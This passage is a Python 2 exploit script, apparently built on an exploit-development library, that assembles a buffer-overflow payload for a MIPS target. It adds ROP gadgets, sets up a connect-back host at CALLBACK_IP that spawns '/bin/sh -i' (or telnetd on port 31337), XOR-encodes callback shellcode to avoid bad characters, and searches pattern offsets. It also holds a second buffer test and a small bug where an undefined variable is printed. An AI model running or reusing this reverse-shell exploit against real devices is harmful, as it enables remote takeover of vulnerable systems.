buf.add_rop_gadget(0x427a4,description="stackfinder.")
#you can instantiate a ConnectbackHost instead ad pass it to both
connectback_host=ConnectbackHost(CALLBACK_IP) #default port is 8080
connectback_server=ConnectbackServer(connectback_host,startcmd="/bin/sh -i")
#Or non-interactive exploitation:
#connectback_server=ConnectbackServer(connectback_host,startcmd="/usr/sbin/telnetd -p 31337",connectback_shell=False)
payload=CallbackPayload(connectback_host,LittleEndian)
encoded_payload=MipsXorEncoder(payload,LittleEndian,badchars=badchars)
buf.add_pattern(700-buf.len())
buf.add_string(encoded_payload.shellcode,
description="encoded connect back payload")
if len(sys.argv) == 2:
search_value=sys.argv[1]
offset=buf.find_offset(search_value)
if(offset < 0):
print "Couldn't find string %s in the overflow buffer." % search_string
else:
print "Found string %s at\noffset: %d" % (search_string,offset)
exit(0)
pid=None
logger.LOG_INFO("Offet of \"u3Au4\": %d" % buf.find_offset("u3Au4"))
logger.LOG_INFO("Creating second emtpy overflow buffer")
buf2=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])
try:
buf2.add_pattern(128)
except Exception as e:
logger.LOG_WARN("Failed to add section.")
logger.LOG_WARN(str(e))
try:
buf2.add_string('A'*128)
except Exception as e:
logger.LOG_WARN("Failed to add section.")
logger.LOG_WARN(str(e))
try:
buf2.add_rop_gadget(0x4dc46fa0)
except Exception as e:
logger.LOG_WARN("Failed to add section.")
logger.LOG_WARN(str(e))
try:
buf2.add_pattern(1024-buf2.len())
except Exception as e:
logger.LOG_WARN("Failed to add section.")
logger.LOG_WARN(str(e))
